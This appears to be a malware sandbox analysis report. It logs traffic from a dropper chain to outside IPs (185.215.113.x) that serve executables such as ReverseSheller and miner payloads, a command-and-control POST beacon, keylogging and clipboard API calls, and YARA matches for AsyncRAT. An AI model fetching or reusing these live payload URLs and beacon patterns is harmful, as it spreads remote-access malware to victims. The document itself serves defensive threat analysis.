Source: unknown	DNS traffic detected: query: affordtempyo.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lightdeerysua.biz replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F8CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

8_2_00F8CE44

Source: global traffic	HTTP traffic detected: GET /files/748049926/k6Sly2p.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/748049926/k6Sly2p.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Tue, 11 Feb 2025 14:56:33 GMTIf-None-Match: "67ab6521-249e00"
Source: global traffic	HTTP traffic detected: GET /files/7244183739/L5shRfh.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/6158422886/r7MRNUY.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/5765828710/ViGgA8C.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC

Source: unknown

HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: mshta.exe, 00000022.00000002.2373355264.00000000030F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.2
Source: powershell.exe, 0000000D.00000002.2303310249.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2303310249.0000000005227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2493401287.00000000053D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16
Source: powershell.exe, 00000034.00000002.2493401287.00000000053D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2550594395.0000000007940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/defend/random.exe
Source: powershell.exe, 0000002A.00000002.2985767298.0000019EB5638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/test/am_no.bat
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/testdef/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000132C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2988300035.00000000013BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php001
Source: skotes.exe, 00000006.00000002.2988300035.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpER
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/05
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/es
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/fae1dac8d9ea1e2feb1d830c7161aeb0bb614131d05d7ea
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/1453454495/Fe36XBk.exeJ
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/1453454495/Fe36XBk.exef
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5643377291/7fOMOTQ.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000132C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2998933668.0000000005CA0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exeZ0123456789
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exej
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exeuNko/index.php
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/6158422886/r7MRNUY.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/6158422886/r7MRNUY.exeX
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/7244183739/L5shRfh.exe
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/748049926/k6Sly2p.exe
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/748049926/k6Sly2p.exeJ
Source: skotes.exe, 00000006.00000002.2988300035.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/748049926/k6Sly2p.exeshqos.dll
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/ReverseSheller/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/c0dxnfz/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/fate/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/none/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/none/random.exeB:
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/rast333a/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dc785309cb.exe, 0000001E.00000000.2341734078.0000000000409000.00000002.00000001.01000000.00000013.sdmp, dc785309cb.exe, 0000001E.00000002.2354541522.0000000000409000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000D.00000002.2313941382.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2985894867.0000024E018DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E1007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2461048730.0000000005BA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC754D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC7683000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000034.00000002.2493401287.0000000005191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2303310249.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2985894867.0000024E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB74D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000034.00000002.2493401287.0000000005191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000010.00000002.3262815435.0000024E79FDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.G-
Source: powershell.exe, 00000010.00000002.2985894867.0000024E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB74D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2303310249.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000034.00000002.2493401287.0000000005191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01257000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.000000000514D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB82BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000D.00000002.2313941382.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2985894867.0000024E018DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E1007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2461048730.0000000005BA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC754D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC7683000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

8_2_00F8EAFF

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

8_2_00F8ED6A

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00F8EAFF

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

8_2_00F7AA57

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00FA9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

8_2_00FA9576

System Summary

Malicious sample detected (through community Yara rule)

Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Binary is likely a compiled AutoIt script file

Source: afccf6841f.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: afccf6841f.exe, 00000008.00000002.2268922496.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_832b1b15-7
